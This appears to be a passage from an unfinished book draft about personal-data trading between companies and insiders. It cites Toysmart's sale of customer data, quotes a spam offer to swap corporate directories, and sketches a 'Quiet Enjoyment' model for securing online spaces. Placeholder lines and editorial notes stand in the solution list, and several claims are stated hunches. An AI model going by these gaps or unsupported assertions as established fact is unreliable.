KITA illustrates a couple of things. First, the smartest, most wary people can be manipulated if you know something about their psychological hot buttons. Second, the study of powerful weaponry—including powerful psychological weaponry—always leads to using that weaponry to gain power. Perhaps most students are balanced and responsible and view “dark side” examples as illustrations of what not to do. The others, perhaps the minority, take their lessons directly from the “dark side” examples. Guess who ends up with more power. The lesson is at least as old as Machiavelli.
Examples of the misuse of the ability to manipulate perceptions and behavior are all around us. Tobacco companies keep their markets alive by getting children addicted. When the heat is on in the United States they work their evil schemes in other countries. Can we prove that with internal memos and other authoritative documentation? Of course not—only idiots put such schemes on paper, and cigarette-marketing executives are not idiots. Nor are KITA-displacers. Nor captologists.
People think of oppressive regimes as exclusively the domain of governments and employers, because they are visible. But the cabal that consists of the network of cookie clubs, the skilled proliferators of parasites, and the captologists has the potential to exceed dictators and company-town tyrants by any measure of oppressiveness. Traditional tyrants control public discourse, leaving any critical thoughts locked inside peoples’ heads. This new axis of evil has the ability to oppress people from within their heads.
Privacy Statements and Private Information Swap Meets
Privacy statements abound. It seems that every website operated by a major organization has one. So what are privacy statements all about? To be sure, privacy statements are probably adhered to by many of the officers of organizations that offer them. But how many privacy statements have you taken the time to read? And what is the probability that some organizations simply do not adhere to them? Perhaps management upholds the policy, but what about contract programmers and part-time or freelance database administrators and “data cleaners,” who really don’t have much loyalty to the organization offering the privacy policy? How difficult is it for someone who touches the information to write a CD or two, or simply email a few files to an acquaintance as a favor? Remember, there is the temptation not only of money but of real power in joining a cookie club.
Consider the case of the failed Internet retailer toysmart.com, a licensee of the TRUSTe Privacy Program. The company’s stated privacy policy was:
Personal information, voluntarily submitted by visitors to our site, such as name, address, billing information and shopping preferences, is never shared with a third party. All information obtained by toysmart.com is used only to personalize your experience online. . . . When you register with toysmart.com, you can rest assured that your information will never be shared with a third party.
Despite assurances to the contrary and the weight of a privacy policy authority, the company did indeed sell personal information, including names and birthdates of consumers’ children. If the first casualty of war is the truth, then the first casualty of financial pressure is integrity. In this case, the sale of information in violation of privacy policy became a public issue that lingered until the good name of Toysmart investor Walt Disney Company started getting dragged around with the story. Disney then put up the money to buy the customer information asset back from the high bidder. The first visible casualty of the uncertain business model underlying the e-tailing “industry” was bound to get the scrutiny of journalists, the SEC, the FTC, and on and on.
Keep in mind that for every Toysmart that goes belly up in a very public fashion, there are hundreds of companies, product lines, business units, and, mostly, middle managers, who are under pressure from upper management and Wall Street to produce results right away.
Do most compromises of personal information take place in such a fishbowl? Surely not. They happen in bland cubicles and over lunch tables. After all, the transfer of eighty gigabytes of information encompassing sensitive information about millions of individuals is as simple as the handing over of an envelope tape cartridge, a blu-ray disk, or one of the really small portable USB hard drives—no management people, no chief privacy officers, no privacy policy involved.
We’ve all heard that in the information age, information is money. It’s true. If information didn’t have high value, there would be no incentive for people to do what we are discussing here.
In assessing the danger to your own privacy, ask the following questions:
1. Are you going to keep track of all the privacy statements affecting all your sources of information and all your venues of communication?
2. Which organizations take them seriously, enforce them internally, and which do not? How will you know? And how will you keep track?
3. What are the mechanisms for connecting the privacy protocol of one organization with that of another organization with which it shares information?
4. Of most concern: people and companies change behavior when the pressure is on. Who ensures that when the company’s stock price starts to tank they don’t seize a quick revenue advantage by taking liberties with PII? All it takes is a “lost” or “stolen” notebook.
There is one big difference between valuable information and valuable money—a difference that often gets overlooked. If I take money out of the company, it is gone. The larger the amount of money, the more likely its absence will be noticed. You can’t click on money and double it by pasting it into a new folder.
Information is different. You steal it, and it’s still there. The company that owns the PII on you is not all that concerned, as long as two conditions are met: first, the disclosure of the information will not cause real financial loss to the company or its management; and no one can later demonstrate that the company or its management was actually involved in the shady transaction.
A manager has a number to meet. There is a sales goal, a service goal—something by which his or her performance will be judged. “If only I had such-and-such a file from the consumer division of our channel partner Acme Industries . . .” End of quarter looms, the performance numbers are not looking so hot. . . . Then a discreet phone call is made. “Hello, Joe? Listen, I want to talk to you about some information you have over there at Acme. Let me buy you lunch tomorrow. . . .”
Now, Acme the corporation would never violate the privacy policy that it publishes so conspicuously on its website. Acme would never tolerate an employee violating the policy on his or her own. That is, Acme would never tolerate it if it were done sloppily and openly.
However, an individual, “unauthorized” action performed deftly and without a trace is another story.
Part of being deft is honoring management’s orders: “Don’t let me hear about any violations of this policy by our people.” In other words, do it quietly. Use your own USB drive from home. And make sure you get some information of roughly equal value in exchange for it. And if I catch you, you’re fired. So don’t let me catch you. But do make your numbers.
We can just hear the chief privacy officer’s reacting to this assertion. “Prove it!” they shout.
Prove it with what—a survey of suspects? Okay, here’s our sample survey:
A statistic about unauthorized data sharing is as unverifiable as a statistic about infidelity. The only sources of information are perpetrators. (Consider surveying prison inmates with one question: “Did you do it?” Would you trust the results?)
But there are clues. The information storage business continues to grow at a fantastic rate, as does the perceived need for storage. Capacities of individual disk drives grow fast, prices of both disk drives and storage management systems decline precipitously, yet revenues of storage vendors are going through the roof. Do the math—revenue divided by price-per-gigabyte for the last five years. Where are all these terabytes being used? How is it that companies are generating information so rapidly? Or are they all swapping information at a furious pace, each making its own copy of everything that comes in over the transom, in a kind of newsgroup-for-snoopers fashion?
Some would say the proliferation of multimedia files account for the rapid growth of storage consumption. But we are talking about corporate storage systems, not home computers. A big graphics-intensive website for a big company might take up a gigabyte. That’s one-thousandth of a terabyte. Big companies gobble up many terabytes of storage each year in order to store names and numbers, not MP3 files and videos.
Here’s another clue. I received the following unsolicited message because somehow someone thought I belonged on a headhunter mail list:
Receive FREE Corporate Directories! Good From November 26th to November 30th, 2001
Dear Executive Recruiter,
DO YOU HAVE ANY CORPORATE DIRECTORIES and/or ASSOCATION DIRECTORIES? WHAT ABOUT EMPLOYEE DATABASES? If so . . .
Welcome to Corporate Directory Trade Week. Take your Corporate Directories and/or Association Directories and TRADE THEM FOR MORE INFORMATION. That’s Right, you can SAVE SERIOUS CASH. This Special Offer is the very first time available. We understand that times are hard due to Sept. 11th, so that is why NOT spending any money on this IMPORTANT RESEARCHING TOOL, is a wonderful opportunity for you to kick start your business. Here is our COMPLETE DIRECTORY LIST for you to choose from . . .
DIRECTORY LIST
AAPP-American Academy of Pharmaceutical Physicians 2001
ASCO-American Society for Clinical Oncology
Quintiles Corporate Directory 2000 CD
SmithKline Beechem 2000
Bayer 2000
Amgen 2001
Shering Plough 2000
Indiana University 2000 ($599.00)
Aventis 2001
PriceWaterhouseCoopers 2001 CD
KPMG 2001 CD
3Com 2000 CD
Accenture 2000
AON Consulting 2001 CD
Above.net 2000 CD
Airtouch 2000 CD
Amazon.com 1999
AnswerThink Consulting 2000 CD
Arthur Andersen 2000
Aspect/i2 Tech 1999/2000 CD
Attendee Telecom Expo 2000 CD
Aurum/Invenys Software 2000 CD
Avery Dennison 2000 CD
Bain & Co. Alumni 2000 CD
Bayer 2000
Booz Allen 2000
Brooktrout Tech. 2000 CD
Cambridge Tech. Partners 2000 CD [54 lines clipped, C to S]
Sun Micro Systems 2000
Texas Instruments 2000
United Tech 2000
US Healthcare 2000 CD
Viacom 2000
Xylan 2000 CD
Yahoo 2000 CD
We look forward on helping your business grow. YOU WILL ALWAYS NEED NEW EMPLOYEE CONTACT INFORMATION!!! We also send samples upon request. We also need samples as well. Honesty is the best policy. [Sender’s name deleted] RESEARCH CONSULTANT 773-377-5002 x6704
That is only a solicitation of employee directory information, which is certainly not the most invasive and sensitive information that might be shared. But look at the process. A middleperson has made a business out of list sharing. Not only that, it’s such an accepted practice that a message like that goes out in broadcast fashion to people who might or might not be headhunters.
Consider what kind of list sharing takes place behind closed doors between parties who are familiar to information brokers. And consider how middlepersons can keep the real sharers of information at arm’s length from the actual transaction, insulating everybody involved from difficulties should news of the event reach the wrong ears.
People are rightfully concerned about companies misusing information about them, which is how privacy statements developed and why we sign them. We also worry about the mere accumulation of information about us, but that concern is a little more diffused and vague. In reality, however, we are not looking at isolated islands of information about ourselves—our personal information has means of traveling off the island of privacy statements.
The following is a personal hunch, far from a provable theory: In the hands of a skillful user of the retrieval language called SQL, the power of a collection of information of certain types to be used as a tool for manipulating perceptions and actions is proportional to the square of its quantity. In other words, doubling the amount of PII in one place or a closely linked set of places quadruples the power of the collection. That is why PII databases grow.
They grow because they want to grow. They want to be big, and therefore they want to merge. Barriers to joining tables in disparate relational databases are withering rapidly. Your tables on a server in Singapore can easily mate with mine in Toronto, the offspring being something that inevitably makes us both more powerful.
How Big Is the Tabular Sex Trade?
We will probably never know the real extent of the practice of illegal and unauthorized table joining. It’s more difficult to track than any underworld activity in history for two reasons: (1) unlike traditional crimes where money must be removed from one place in order for it to appear in another, tables are not removed—they are copied; and (2) the perpetrators do not have to physically meet. The tabular sex trade is a prime beneficiary of the virtual enterprise movement, operating as it does in a world where virtual offices need no occupancy permits.As in other situations where a new weapon technology or criminal opportunity has been invented, the question is not whether but when and to what extent. Illegal tabular sex appears to be pervasive now, but it will only get worse. Unless we take steps to stop it.
The Solution
Fixing the Internet may seem like a darkly daunting task, but there is one celestially bright spot. By replacing the assumptions that underlie the design of our information facilities with another very familiar set of assumptions about facilities, the solution becomes exceedingly clear.1. Understand that the Internet is, as originally characterized, a highway, that is, an outdoor public transport facility. This applies to all existing “layers” of the Internet Protocol (IP): they are all transport layers. The so-called “application layer” is really the signage and markings layer on the highway.
2. Toss aside the notion that you can’t understand this stuff. If you understand how to use a highway you can understand this. We will show that if you aren’t carrying the baggage of an information security expert, then you will understand the architecture of online facilities better than an information security expert does.
3. Ask yourself: what are highways typically used for. Most vehicles on the roadways are transporting people and things from one building to another building.
4. Ask yourself: what does a building provide that a highway does not.
5. another point
6. another point
7. We have a fine set of construction materials for making buildings as opposed to highways. This set of materials is called PKI.
8. PKI experts understand construction materials very well. They know nothing about architecture, building codes, and occupancy permits.
9. For that reason, they have built the only kind of structure that they, as experts in highways and construction materials, understand. They have built tunnels.
10. What is a tunnel? It’s of course a tube, quite secure through its length but open at the ends.
11. How do they secure what goes on at the ends? They secure that space as one secures an outdoor space: with barbed wire and guards and sentry gates called “firewalls” and “intrusion detection/prevention systems” and “unified threat management appliances.” (Imagine if your office building were one big open space, all file cabinets and meeting tables and whiteboards were in one huge room. Sentries in the parking lot and at the door tried to identify “bad” cars and people and “good” cars and people and only let the good ones in.
12. Even though all files are kept in one big open area, they are not without protection. Each piece of paper in each file folder in each file cabinet has at least four lists attached to it:
a. A list of people who may read it
b. A list of people who may add to it
c. A list of people who may edit it
d. A list of people who may delete it
13. There are literally millions of pieces of paper in hundreds of thousands of folders in thousands of file drawers in this office building without interior walls. To ensure security, it is the responsibility of the person who originally wrote each piece of paper to ensure that the list of those who may read, write, edit and delete that piece of paper is kept up to date.
14. As you may imagine, even the most diligent employees, who spend half their time managing their pieces of paper, can only do a mediocre job of managing those information resources.
NEED A SHORT TERM FOR THE SOLUTION FOR FIXING THE INTERNET (e.g., providing secure Internet real estate in which to have Quiet Enjoyment. The more we look at the way in which we come to have confidence in our physical buildings, the more we realize that the process of developing reliable online spaces is so similar as to be in many respects identical.
BRIEF SUMMARY PARAGRAPH OF HIGHWAY/INDOORS/BUNKER/QEI.
The open Information Highway exposes two fundamental privacy issues: (1) the loss of personal privacy to the roving gangs of privacy thieves described in this chapter; and (2) the problems we would face if everyone were granted complete inviolable privacy. It would be the rare privacy activist who, given evidence that a team of terrorists was planning a nuclear attack on a large city, would advocate protection of the team’s communication from law enforcement officials.
Later, in a discussion of various technologies related to authentication, privacy, and security, we will introduce anonymizers, which can thoroughly obscure identities of users. We will also suggest ways in which anonymizers and identity credentials can reinforce each other and ways in which anonymizers can effect solutions to public safety problems.
When QEI becomes reality, you will be able to take the steps that will put an end to concerns about privacy, and make your life much more manageable as well. You will be able to have your privacy—and have the Internet too. Identity theft can be a thing of the past. So too can the nagging feeling that uninvited, intrusive marketers are collecting information about you behind your back. In the process ,you’ll dramatically reduce the amount of “administrivia” in your life, allowing you to focus on the things that you find meaningful rather than the things that your insurer, health care provider, bank, school, and government agencies find meaningful. QEI will replace those privacy-stealing robots with your own private personal-assistant robots, your own completely diligent personal secretary to fill in all repetitive information in forms, disclosing your personal information only to parties strictly authorized by you, interrupting you only when your judgment is called for.
How do you do all this?
The answer is as near as your desk in your den.
Would you permit a group of strangers to enter you home unannounced and make copies of everything they found on your desk and in your filing cabinets? Would you allow them to rearrange your files so that they present a view of things that’s more to their liking and more likely to make you do what they would like you to do?
No? Then why let strangers do to your online desk and files what you would never let them do with your physical information facilities?
Let’s move your online desk and your online den out of their current location on the side of a busy highway. It’s time to move them indoors, where Quiet Enjoyment reigns.